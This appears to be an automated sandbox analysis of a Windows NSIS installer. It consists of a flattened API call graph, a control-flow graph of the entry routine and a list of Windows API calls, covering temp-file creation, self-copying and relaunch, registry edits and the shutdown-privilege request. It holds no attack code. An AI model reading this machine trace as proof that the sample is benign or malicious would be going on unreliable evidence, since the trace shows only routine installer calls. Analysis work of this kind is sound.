RegCloseKey 3298->3301 3300->3301 3309 406201 wsprintfW 3300->3309 3301->3299 3305 402c41 17 API calls 3304->3305 3306 402c98 3305->3306 3307 406127 RegOpenKeyExW 3306->3307 3308 40248e 3307->3308 3308->3296 3309->3301 4054 401f06 4055 402c41 17 API calls 4054->4055 4056 401f0c 4055->4056 4057 405322 24 API calls 4056->4057 4058 401f16 4057->4058 4059 4058a3 2 API calls 4058->4059 4060 401f1c 4059->4060 4061 401f3f CloseHandle 4060->4061 4062 40288b 4060->4062 4063 406745 5 API calls 4060->4063 4061->4062 4065 401f31 4063->4065 4065->4061 4067 406201 wsprintfW 4065->4067 4067->4061 4068 40190c 4069 401943 4068->4069 4070 402c41 17 API calls 4069->4070 4071 401948 4070->4071 4072 4059cc 67 API calls 4071->4072 4073 401951 4072->4073 4074 40230c 4075 402314 4074->4075 4077 40231a 4074->4077 4076 402c41 17 API calls 4075->4076 4076->4077 4078 402328 4077->4078 4080 402c41 17 API calls 4077->4080 4079 402336 4078->4079 4081 402c41 17 API calls 4078->4081 4082 402c41 17 API calls 4079->4082 4080->4078 4081->4079 4083 40233f WritePrivateProfileStringW 4082->4083 4084 401f8c 4085 402c41 17 API calls 4084->4085 4086 401f93 4085->4086 4087 406694 5 API calls 4086->4087 4088 401fa2 4087->4088 4089 402026 4088->4089 4090 401fbe GlobalAlloc 4088->4090 4090->4089 4091 401fd2 4090->4091 4092 406694 5 API calls 4091->4092 4093 401fd9 4092->4093 4094 406694 5 API calls 4093->4094 4095 401fe3 4094->4095 4095->4089 4099 406201 wsprintfW 4095->4099 4097 402018 4100 406201 wsprintfW 4097->4100 4099->4097 4100->4089 4101 40238e 4102 4023c1 4101->4102 4103 402396 4101->4103 4105 402c41 17 API calls 4102->4105 4104 402c81 17 API calls 4103->4104 4107 40239d 4104->4107 4106 4023c8 4105->4106 4112 402cff 4106->4112 4109 4023d5 4107->4109 4110 402c41 17 API calls 4107->4110 4111 4023ae RegDeleteValueW RegCloseKey 4110->4111 4111->4109 4113 402d13 4112->4113 4115 402d0c 4112->4115 4113->4115 4116 402d44 4113->4116 4115->4109 4117 406127 RegOpenKeyExW 4116->4117 4118 402d72 4117->4118 4119 402d98 RegEnumKeyW 4118->4119 4120 402daf RegCloseKey 4118->4120 4121 402dd0 RegCloseKey 4118->4121 4123 402d44 6 API calls 4118->4123 4126 402dc3 4118->4126 4119->4118 4119->4120 4122 406694 5 API calls 4120->4122 4121->4126 4124 402dbf 4122->4124 4123->4118 4125 402de0 RegDeleteKeyW 4124->4125 4124->4126 4125->4126 4126->4115 3363 40338f SetErrorMode GetVersion 3364 4033ce 3363->3364 3365 4033d4 3363->3365 3366 406694 5 API calls 3364->3366 3367 406624 3 API calls 3365->3367 3366->3365 3368 4033ea lstrlenA 3367->3368 3368->3365 3369 4033fa 3368->3369 3370 406694 5 API calls 3369->3370 3371 403401 3370->3371 3372 406694 5 API calls 3371->3372 3373 403408 3372->3373 3374 406694 5 API calls 3373->3374 3375 403414 #17 OleInitialize SHGetFileInfoW 3374->3375 3453 4062ba lstrcpynW 3375->3453 3378 403460 GetCommandLineW 3454 4062ba lstrcpynW 3378->3454 3380 403472 3381 405bbc CharNextW 3380->3381 3382 403497 CharNextW 3381->3382 3383 4035c1 GetTempPathW 3382->3383 3394 4034b0 3382->3394 3455 40335e 3383->3455 3385 4035d9 3386 403633 DeleteFileW 3385->3386 3387 4035dd GetWindowsDirectoryW lstrcatW 3385->3387 3465 402edd GetTickCount GetModuleFileNameW 3386->3465 3388 40335e 12 API calls 3387->3388 3391 4035f9 3388->3391 3389 405bbc CharNextW 3389->3394 3391->3386 3393 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3391->3393 3392 403647 3395 4036fe ExitProcess CoUninitialize 3392->3395 3404 405bbc CharNextW 3392->3404 3436 4036ea 3392->3436 3396 40335e 12 API calls 3393->3396 3394->3389 3397 4035ac 3394->3397 3398 4035aa 3394->3398 3399 403834 3395->3399 3400 403714 3395->3400 3402 40362b 3396->3402 3549 4062ba lstrcpynW 3397->3549 3398->3383 3401 40383c GetCurrentProcess OpenProcessToken 3399->3401 3411 4038b8 ExitProcess 3399->3411 3406 405920 MessageBoxIndirectW 3400->3406 3408 403854 LookupPrivilegeValueW AdjustTokenPrivileges 3401->3408 3409 403888 3401->3409 3402->3386 3402->3395 3420 403666 3404->3420 3407 403722 ExitProcess 3406->3407 3408->3409 3413 406694 5 API calls 3409->3413 3410 4036fa 3410->3395 3416 40388f 3413->3416 3414 4036c4 3418 405c97 18 API calls 3414->3418 3415 40372a 3417 40588b 5 API calls 3415->3417 3419 4038a4 ExitWindowsEx 3416->3419 3423 4038b1 3416->3423 3421 40372f lstrcatW 3417->3421 3422 4036d0 3418->3422 3419->3411 3419->3423 3420->3414 3420->3415 3424 403740 lstrcatW 3421->3424 3425 40374b lstrcatW lstrcmpiW 3421->3425 3422->3395 3550 4062ba lstrcpynW 3422->3550 3557 40140b 3423->3557 3424->3425 3425->3395 3427 403767 3425->3427 3429 403773 3427->3429 3430 40376c 3427->3430 3434 40586e 2 API calls 3429->3434 3432 4057f1 4 API calls 3430->3432 3431 4036df 3551 4062ba lstrcpynW 3431->3551 3435 403771 3432->3435 3437 403778 SetCurrentDirectoryW 3434->3437 3435->3437 3493 4039aa 3436->3493 3438 403793 3437->3438 3439 403788 3437->3439 3553 4062ba lstrcpynW 3438->3553 3552 4062ba lstrcpynW 3439->3552 3442 4062dc 17 API calls 3443 4037d2 DeleteFileW 3442->3443 3444 4037df CopyFileW 3443->3444 3450 4037a1 3443->3450 3444->3450 3445 403828 3446 406080 36 API calls 3445->3446 3448 40382f 3446->3448 3447 406080 36 API calls 3447->3450 3448->3395 3449 4062dc 17 API calls 3449->3450 3450->3442 3450->3445 3450->3447 3450->3449 3452 403813 CloseHandle 3450->3452 3554 4058a3 CreateProcessW 3450->3554 3452->3450 3453->3378 3454->3380 3456 40654e 5 API calls 3455->3456 3458 40336a 3456->3458 3457 403374 3457->3385 3458->3457 3459 405b8f 3 API calls 3458->3459 3460 40337c 3459->3460 3461 40586e 2 API calls 3460->3461 3462 403382 3461->3462 3560 405ddf 3462->3560 3564 405db0 GetFileAttributesW CreateFileW 3465->3564 3467 402f1d 3492 402f2d 3467->3492 3565 4062ba lstrcpynW 3467->3565 3469 402f43 3470 405bdb 2 API calls 3469->3470 3471 402f49 3470->3471 3566 4062ba lstrcpynW 3471->3566 3473 402f54 GetFileSize 3474 403050 3473->3474 3491 402f6b 3473->3491 3567 402e79 3474->3567 3476 403059 3478 403089 GlobalAlloc 3476->3478 3476->3492 3579 403347 SetFilePointer 3476->3579 3477 403331 ReadFile 3477->3491 3578 403347 SetFilePointer 3478->3578 3480 4030bc 3482 402e79 6 API calls 3480->3482 3482->3492 3483 403072 3485 403331 ReadFile 3483->3485 3484 4030a4 3486 403116 31 API calls 3484->3486 3487 40307d 3485->3487 3489 4030b0 3486->3489 3487->3478 3487->3492 3488 402e79 6 API calls 3488->3491 3489->3489 3490 4030ed SetFilePointer 3489->3490 3489->3492 3490->3492 3491->3474 3491->3477 3491->3480 3491->3488 3491->3492 3492->3392 3494 406694 5 API calls 3493->3494 3495 4039be 3494->3495 3496 4039c4 3495->3496 3497 4039d6 3495->3497 3592 406201 wsprintfW 3496->3592 3498 406188 3 API calls 3497->3498 3499 403a06 3498->3499 3501 403a25 lstrcatW 3499->3501 3503 406188 3 API calls 3499->3503 3502 4039d4 3501->3502 3584 403c80 3502->3584 3503->3501 3506 405c97 18 API calls 3507 403a57 3506->3507 3508 403aeb 3507->3508 3510 406188 3 API calls 3507->3510 3509 405c97 18 API calls 3508->3509 3511 403af1 3509->3511 3512 403a89 3510->3512 3513 403b01 LoadImageW 3511->3513 3514 4062dc 17 API calls 3511->3514 3512->3508 3517 403aaa lstrlenW 3512->3517 3520 405bbc CharNextW 3512->3520 3515 403ba7 3513->3515 3516 403b28 RegisterClassW 3513->3516 3514->3513 3519 40140b 2 API calls 3515->3519 3518 403b5e SystemParametersInfoW CreateWindowExW 3516->3518 3548 403bb1 3516->3548 3521 403ab8 lstrcmpiW 3517->3521 3522 403ade 3517->3522 3518->3515 3523 403bad 3519->3523 3524 403aa7 3520->3524 3521->3522 3525 403ac8 GetFileAttributesW 3521->3525 3526 405b8f 3 API calls 3522->3526 3528 403c80 18 API calls 3523->3528 3523->3548 3524->3517 3527 403ad4 3525->3527 3529 403ae4 3526->3529 3527->3522 3531 405bdb 2 API calls 3527->3531 3532 403bbe 3528->3532 3593 4062ba lstrcpynW 3529->3593 3531->3522 3533 403bca ShowWindow 3532->3533 3534 403c4d 3532->3534 3535 406624 3 API calls 3533->3535 3536 4053f5 5 API calls 3534->3536 3537 403be2 3535->3537 3538 403c53 3536->3538 3539 403bf0 GetClassInfoW 3537->3539 3542 406624 3 API calls 3537->3542 3540 403c57 3538->3540 3541 403c6f 3538->3541 3544 403c04 GetClassInfoW RegisterClassW 3539->3544 3545 403c1a DialogBoxParamW 3539->3545 3546 40140b 2 API calls 3540->3546 3540->3548 3543 40140b 2 API calls 3541->3543 3542->3539 3543->3548 3544->3545 3547 40140b 2 API calls 3545->3547 3546->3548 3547->3548 3548->3410 3549->3398 3550->3431 3551->3436 3552->3438 3553->3450 3555 4058e2 3554->3555 3556 4058d6 CloseHandle 3554->3556 3555->3450 3556->3555 3558 401389 2 API calls 3557->3558 3559 401420 3558->3559 3559->3411 3561 405dec GetTickCount GetTempFileNameW 3560->3561 3562 405e22 3561->3562 3563 40338d 3561->3563 3562->3561 3562->3563 3563->3385 3564->3467 3565->3469 3566->3473 3568 402e82 3567->3568 3569 402e9a 3567->3569 3570 402e92 3568->3570 3571 402e8b DestroyWindow 3568->3571 3572 402ea2 3569->3572 3573 402eaa GetTickCount 3569->3573 3570->3476 3571->3570 3580 4066d0 3572->3580 3575 402eb8 CreateDialogParamW ShowWindow 3573->3575 3576 402edb 3573->3576 3575->3576 3576->3476 3578->3484 3579->3483 3581 4066ed PeekMessageW 3580->3581 3582 4066e3 DispatchMessageW 3581->3582 3583 402ea8 3581->3583 3582->3581 3583->3476 3585 403c94 3584->3585 3594 406201 wsprintfW 3585->3594 3587 403d05 3595 403d39 3587->3595 3589 403d0a 3590 403a35 3589->3590 3591 4062dc 17 API calls 3589->3591 3590->3506 3591->3589 3592->3502 3593->3508 3594->3587 3596 4062dc 17 API calls 3595->3596 3597 403d47 SetWindowTextW 3596->3597 3597->3589 4127 40190f 4128 402c41 17 API calls 4127->4128 4129 401916 4128->4129 4130 405920 MessageBoxIndirectW 4129->4130 4131 40191f 4130->4131 4132 401491 4133 405322 24 API calls 4132->4133 4134 401498 4133->4134 4135 401d14 4136 402c1f 17 API calls 4135->4136 4137 401d1b 4136->4137 4138 402c1f 17 API calls 4137->4138 4139 401d27 GetDlgItem 4138->4139 4140 402592 4139->4140 4141 405296 4142 4052a6 4141->4142 4143 4052ba 4141->4143 4145 4052ac 4142->4145 4153 405303 4142->4153 4144 4052c2 IsWindowVisible 4143->4144 4147 4052d9 4143->4147 4146 4052cf 4144->4146 4144->4153 4149 40427d SendMessageW 4145->4149 4154 404bec SendMessageW 4146->4154 4148 405308 CallWindowProcW 4147->4148 4159 404c6c 4147->4159 4150 4052b6 4148->4150 4149->4150 4153->4148 4155 404c4b SendMessageW 4154->4155 4156 404c0f GetMessagePos ScreenToClient SendMessageW 4154->4156 4157 404c43 4155->4157 4156->4157 4158 404c48 4156->4158 4157->4147 4158->4155 4168 4062ba lstrcpynW 4159->4168 4161 404c7f 4169 406201 wsprintfW 4161->4169 4163 404c89 4164 40140b 2 API calls 4163->4164 4165 404c92 4164->4165 4170 4062ba lstrcpynW 4165->4170 4167 404c99 4167->4153 4168->4161 4169->4163 4170->4167 4171 402598 4172 4025c7 4171->4172 4173 4025ac 4171->4173 4175 4025fb 4172->4175 4176 4025cc 4172->4176 4174 402c1f 17 API calls 4173->4174 4181 4025b3 4174->4181 4178 402c41 17 API calls 4175->4178 4177 402c41 17 API calls 4176->4177 4179 4025d3 WideCharToMultiByte lstrlenA 4177->4179 4180 402602 lstrlenW 4178->4180 4179->4181 4180->4181 4182 40262f 4181->4182 4183 402645 4181->4183 4185 405e91 5 API calls 4181->4185 4182->4183 4184 405e62 WriteFile 4182->4184 4184->4183 4185->4182 4186 404c9e GetDlgItem GetDlgItem 4187 404cf0 7 API calls 4186->4187 4194 404f09 4186->4194 4188 404d93 DeleteObject 4187->4188 4189 404d86 SendMessageW 4187->4189 4190 404d9c 4188->4190 4189->4188 4192 404dd3 4190->4192 4193 4062dc 17 API calls 4190->4193 4191 404fed 4196 405099 4191->4196 4207 405046 SendMessageW 4191->4207 4229 404efc 4191->4229 4195 404231 18 API calls 4192->4195 4198 404db5 SendMessageW SendMessageW 4193->4198 4194->4191 4197 404f7a 4194->4197 4205 404bec 5 API calls 4194->4205 4201 404de7 4195->4201 4199 4050a3 SendMessageW 4196->4199 4200 4050ab 4196->4200 4197->4191 4203 404fdf SendMessageW 4197->4203 4198->4190 4199->4200 4204 4050d4 4200->4204 4209 4050c4 4200->4209 4210 4050bd ImageList_Destroy 4200->4210 4206 404231 18 API calls 4201->4206 4202 404298 8 API calls 4208 40528f 4202->4208 4203->4191 4212 405243 4204->4212 4228 404c6c 4 API calls 4204->4228 4233 40510f 4204->4233 4205->4197 4211 404df5 4206->4211 4213 40505b SendMessageW 4207->4213 4207->4229 4209->4204 4214 4050cd GlobalFree 4209->4214 4210->4209 4215 404eca GetWindowLongW SetWindowLongW 4211->4215 4222 404ec4 4211->4222 4225 404e45 SendMessageW 4211->4225 4226 404e81 SendMessageW 4211->4226 4227 404e92 SendMessageW 4211->4227 4216 405255 ShowWindow GetDlgItem ShowWindow 4212->4216 4212->4229 4218 40506e 4213->4218 4214->4204 4217 404ee3 4215->4217 4216->4229 4219 404f01 4217->4219 4220 404ee9 ShowWindow 4217->4220 4221 40507f SendMessageW 4218->4221 4238 404266 SendMessageW 4219->4238 4237 404266 SendMessageW 4220->4237 4221->4196 4222->4215 4222->4217 4225->4211 4226->4211 4227->4211 4228->4233 4229->4202 4230 405219 InvalidateRect 4230->4212 4231 40522f 4230->4231 4239 404ba7 4231->4239 4232 40513d SendMessageW 4236 405153 4232->4236 4233->4232 4233->4236 4235 4051c7 SendMessageW SendMessageW 4235->4236 4236->4230 4236->4235 4237->4229 4238->4194 4242 404ade 4239->4242 4241 404bbc 4241->4212 4243 404af7 4242->4243 4244 4062dc 17 API calls 4243->4244 4245 404b5b 4244->4245 4246 4062dc 17 API calls 4245->4246 4247 404b66 4246->4247 4248 4062dc 17 API calls 4247->4248 4249 404b7c lstrlenW wsprintfW SetDlgItemTextW 4248->4249 4249->4241 4250 40149e 4251 4022f7 4250->4251 4252 4014ac PostQuitMessage 4250->4252 4252->4251 3750 401c1f 3751 402c1f 17 API calls 3750->3751 3752 401c26 3751->3752 3753 402c1f 17 API calls 3752->3753 3754 401c33 3753->3754 3755 401c48 3754->3755 3757 402c41 17 API calls 3754->3757 3756 401c58 3755->3756 3758 402c41 17 API calls 3755->3758 3759 401c63 3756->3759 3760 401caf 3756->3760 3757->3755 3758->3756 3761 402c1f 17 API calls 3759->3761 3762 402c41 17 API calls 3760->3762 3763 401c68 3761->3763 3764 401cb4 3762->3764 3765 402c1f 17 API calls 3763->3765 3766 402c41 17 API calls 3764->3766 3767 401c74 3765->3767 3768 401cbd FindWindowExW 3766->3768 3769 401c81 SendMessageTimeoutW 3767->3769 3770 401c9f SendMessageW 3767->3770 3771 401cdf 3768->3771 3769->3771 3770->3771 4253 402aa0 SendMessageW 4254 402ac5 4253->4254 4255 402aba InvalidateRect 4253->4255 4255->4254 4256 402821 4257 402827 4256->4257 4258 402ac5 4257->4258 4259 40282f FindClose 4257->4259 4259->4258 4260 4043a1 lstrlenW 4261 4043c0 4260->4261 4262 4043c2 WideCharToMultiByte 4260->4262 4261->4262 4263 404722 4264 40474e 4263->4264 4265 40475f 4263->4265 4324 405904 GetDlgItemTextW 4264->4324 4267 40476b GetDlgItem 4265->4267 4273 4047ca 4265->4273 4269 40477f 4267->4269 4268 404759 4271 40654e 5 API calls 4268->4271 4272 404793 SetWindowTextW 4269->4272 4280 405c3a 4 API calls 4269->4280 4270 4048ae 4274 404a5d 4270->4274 4326 405904 GetDlgItemTextW 4270->4326 4271->4265 4276 404231 18 API calls 4272->4276 4273->4270 4273->4274 4277 4062dc 17 API calls 4273->4277 4279 404298 8 API calls 4274->4279 4281 4047af 4276->4281 4282 40483e SHBrowseForFolderW 4277->4282 4278 4048de 4283 405c97 18 API calls 4278->4283 4284 404a71 4279->4284 4285 404789 4280->4285 4286 404231 18 API calls 4281->4286 4282->4270 4287 404856 CoTaskMemFree 4282->4287 4288 4048e4 4283->4288 4285->4272 4291 405b8f 3 API calls 4285->4291 4289 4047bd 4286->4289 4290 405b8f 3 API calls 4287->4290 4327 4062ba lstrcpynW 4288->4327 4325 404266 SendMessageW 4289->4325 4293 404863 4290->4293 4291->4272 4296 40489a SetDlgItemTextW 4293->4296 4300 4062dc 17 API calls 4293->4300 4295 4047c3 4298 406694 5 API calls 4295->4298 4296->4270 4297 4048fb 4299 406694 5 API calls 4297->4299 4298->4273 4307 404902 4299->4307 4301 404882 lstrcmpiW 4300->4301 4301->4296 4304 404893 lstrcatW 4301->4304 4302 404943 4328 4062ba lstrcpynW 4302->4328 4304->4296 4305 40494a 4306 405c3a 4 API calls 4305->4306 4308 404950 GetDiskFreeSpaceW 4306->4308 4307->4302 4310 405bdb 2 API calls 4307->4310 4312 40499b 4307->4312 4311 404974 MulDiv 4308->4311 4308->4312 4310->4307 4311->4312 4313 404a0c 4312->4313 4314 404ba7 20 API calls 4312->4314 4315 404a2f 4313->4315 4317 40140b 2 API calls 4313->4317 4316 4049f9 4314->4316 4329 404253 KiUserCallbackDispatcher 4315->4329 4319 404a0e SetDlgItemTextW 4316->4319 4320 4049fe 4316->4320 4317->4315 4319->4313 4322 404ade 20 API calls 4320->4322 4321 404a4b 4321->4274 4323 40467b SendMessageW 4321->4323 4322->4313 4323->4274 4324->4268 4325->4295 4326->4278 4327->4297 4328->4305 4329->4321 4330 4015a3 4331 402c41 17 API calls 4330->4331 4332 4015aa SetFileAttributesW 4331->4332 4333 4015bc 4332->4333 4334 4029a8 4335 402c1f 17 API calls 4334->4335 4336 4029ae 4335->4336 4337 4029d5 4336->4337 4338 4029ee 4336->4338 4346 40288b 4336->4346 4341 4029da 4337->4341 4347 4029eb 4337->4347 4339 402a08 4338->4339 4340 4029f8 4338->4340 4343 4062dc 17 API calls 4339->4343 4342 402c1f 17 API calls 4340->4342 4348 4062ba lstrcpynW 4341->4348 4342->4347 4343->4347 4347->4346 4349 406201 wsprintfW 4347->4349 4348->4346 4349->4346 4350 4028ad 4351 402c41 17 API calls 4350->4351 4353 4028bb 4351->4353 4352 4028d1 4355 405d8b 2 API calls 4352->4355 4353->4352 4354 402c41 17 API calls 4353->4354 4354->4352 4356 4028d7 4355->4356 4378 405db0 GetFileAttributesW CreateFileW 4356->4378 4358 4028e4 4359 4028f0 GlobalAlloc 4358->4359 4360 402987 4358->4360 4363 402909 4359->4363 4364 40297e CloseHandle 4359->4364 4361 4029a2 4360->4361 4362 40298f DeleteFileW 4360->4362 4362->4361 4379 403347 SetFilePointer 4363->4379 4364->4360 4366 40290f 4367 403331 ReadFile 4366->4367 4368 402918 GlobalAlloc 4367->4368 4369 402928 4368->4369 4370 40295c 4368->4370 4371 403116 31 API calls 4369->4371 4372 405e62 WriteFile 4370->4372 4374 402935 4371->4374 4373 402968 GlobalFree 4372->4373 4375 403116 31 API calls 4373->4375 4376 402953 GlobalFree 4374->4376 4377 40297b 4375->4377 4376->4370 4377->4364 4378->4358 4379->4366 4380 401a30 4381 402c41 17 API calls 4380->4381 4382 401a39 ExpandEnvironmentStringsW 4381->4382 4383 401a4d 4382->4383 4385 401a60 4382->4385 4384 401a52 lstrcmpW 4383->4384 4383->4385 4384->4385 3609 402032 3610 402044 3609->3610 3620 4020f6 3609->3620 3611 402c41 17 API calls 3610->3611 3613 40204b 3611->3613 3612 401423 24 API calls 3614 402250 3612->3614 3615 402c41 17 API calls 3613->3615 3616 402054 3615->3616 3617 40206a LoadLibraryExW 3616->3617 3618 40205c GetModuleHandleW 3616->3618 3619 40207b 3617->3619 3617->3620 3618->3617 3618->3619 3629 406703 WideCharToMultiByte 3619->3629 3620->3612 3623 4020c5 3625 405322 24 API calls 3623->3625 3624 40208c 3626 401423 24 API calls 3624->3626 3627 40209c 3624->3627 3625->3627 3626->3627 3627->3614 3628 4020e8 FreeLibrary 3627->3628 3628->3614 3630 40672d GetProcAddress 3629->3630 3631 402086 3629->3631 3630->3631 3631->3623 3631->3624 4391 401735 4392 402c41 17 API calls 4391->4392 4393 40173c SearchPathW 4392->4393 4394 401757 4393->4394 4395 402a35 4396 402c1f 17 API calls 4395->4396 4397 402a3b 4396->4397 4398 402a72 4397->4398 4399 40288b 4397->4399 4401 402a4d 4397->4401 4398->4399 4400 4062dc 17 API calls 4398->4400 4400->4399 4401->4399 4403 406201 wsprintfW 4401->4403 4403->4399 4404 4014b8 4405 4014be 4404->4405 4406 401389 2 API calls 4405->4406 4407 4014c6 4406->4407 4408 401db9 GetDC 4409 402c1f 17 API calls 4408->4409 4410 401dcb GetDeviceCaps MulDiv ReleaseDC 4409->4410 4411 402c1f 17 API calls 4410->4411 4412 401dfc 4411->4412 4413 4062dc 17 API calls 4412->4413 4414 401e39 CreateFontIndirectW 4413->4414 4415 402592 4414->4415 4416 40283b 4417 402843 4416->4417 4418 402847 FindNextFileW 4417->4418 4421 402859 4417->4421 4419 4028a0 4418->4419 4418->4421 4422 4062ba lstrcpynW 4419->4422 4422->4421

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 40338f-4033cc SetErrorMode GetVersion 1 4033ce-4033d6 call 406694 0->1 2 4033df 0->2 1->2 7 4033d8 1->7 4 4033e4-4033f8 call 406624 lstrlenA 2->4 9 4033fa-403416 call 406694 * 3 4->9 7->2 16 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 9->16 17 403418-40341e 9->17 24 403490-4034aa call 405bbc CharNextW 16->24 25 403488-40348f 16->25 17->16 21 403420 17->21 21->16 28 4034b0-4034b6 24->28 29 4035c1-4035db GetTempPathW call 40335e 24->29 25->24 30 4034b8-4034bd 28->30 31 4034bf-4034c3 28->31 38 403633-40364d DeleteFileW call 402edd 29->38 39 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 29->39 30->30 30->31 33 4034c5-4034c9 31->33 34 4034ca-4034ce 31->34 33->34 36 4034d4-4034da 34->36 37 40358d-40359a call 405bbc 34->37 43 4034f5-40352e 36->43 44 4034dc-4034e4 36->44 54 40359c-40359d 37->54 55 40359e-4035a4 37->55 56 403653-403659 38->56 57 4036fe-40370e ExitProcess CoUninitialize 38->57 39->38 52 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 39->52 50 403530-403535 43->50 51 40354b-403585 43->51 48 4034e6-4034e9 44->48 49 4034eb 44->49 48->43 48->49 49->43 50->51 58 403537-40353f 50->58 51->37 53 403587-40358b 51->53 52->38 52->57 53->37 60 4035ac-4035ba call 4062ba 53->60 54->55 55->28 61 4035aa 55->61 62 4036ee-4036f5 call 4039aa 56->62 63 40365f-40366a call 405bbc 56->63 64 403834-40383a 57->64 65 403714-403724 call 405920 ExitProcess 57->65 66 403541-403544 58->66 67 403546 58->67 71 4035bf 60->71 61->71 80 4036fa 62->80 84 4036b8-4036c2 63->84 85 40366c-4036a1 63->85 68 4038b8-4038c0 64->68 69 40383c-403852 GetCurrentProcess OpenProcessToken 64->69 66->51 66->67 67->51 81 4038c2 68->81 82 4038c6-4038ca ExitProcess 68->82 77 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 69->77 78 403888-403896 call 406694 69->78 71->29 77->78 92 4038a4-4038af ExitWindowsEx 78->92 93 403898-4038a2 78->93 80->57 81->82 86 4036c4-4036d2 call 405c97 84->86 87 40372a-40373e call 40588b lstrcatW 84->87 89 4036a3-4036a7 85->89 86->57 102 4036d4-4036ea call 4062ba * 2 86->102 100 403740-403746 lstrcatW 87->100 101 40374b-403765 lstrcatW lstrcmpiW 87->101 94 4036b0-4036b4 89->94 95 4036a9-4036ae 89->95 92->68 99 4038b1-4038b3 call 40140b 92->99 93->92 93->99 94->89 96 4036b6 94->96 95->94 95->96 96->84 99->68 100->101 101->57 105 403767-40376a 101->105 102->62 107 403773 call 40586e 105->107 108 40376c-403771 call 4057f1 105->108 115 403778-403786 SetCurrentDirectoryW 107->115 108->115 116 403793-4037bc call 4062ba 115->116 117 403788-40378e call 4062ba 115->117 121 4037c1-4037dd call 4062dc DeleteFileW 116->121 117->116 124 40381e-403826 121->124 125 4037df-4037ef CopyFileW 121->125 124->121 127 403828-40382f call 406080 124->127 125->124 126 4037f1-403811 call 406080 call 4062dc call 4058a3 125->126 126->124 136 403813-40381a CloseHandle 126->136 127->57 136->124
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 004033B2
                                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 004033B8
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                                                                                                                                                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040342F
                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(00440208,00000000,?,000002B4,00000000), ref: 0040344B
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00472EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                                                                                                                                                                                          • CharNextW.USER32(00000000,004CB000,00000020,004CB000,00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                                                                                                                                                                                            • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                                            • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00002000,004DF000,?,00000006,00000008,0000000A), ref: 004035D2
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(004DF000,00001FFB,?,00000006,00000008,0000000A), ref: 004035E3
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004DF000,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00001FFC,004DF000,004DF000,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004DF000,Low,?,00000006,00000008,0000000A), ref: 0040360B
                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,004DF000,004DF000,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,004DF000,?,00000006,00000008,0000000A), ref: 00403624
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(004DB000,?,00000006,00000008,0000000A), ref: 00403638
                                                                                                                                                                                                                            • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00002000,00403460,00472EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 004036FE
                                                                                                                                                                                                                          • CoUninitialize.COMBASE(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403724
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004DF000,~nsu,004CB000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004DF000,0040A26C,004DF000,~nsu,004CB000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004DF000,.tmp,004DF000,~nsu,004CB000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(004DF000,004D7000,004DF000,.tmp,004DF000,~nsu,004CB000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(004DF000,004DF000,?,00000006,00000008,0000000A), ref: 00403779
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(0043C208,0043C208,?,0047B000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                                                                                                                                                                                          • CopyFileW.KERNEL32(004E7000,0043C208,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0043C208,0043C208,?,0043C208,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004038CA
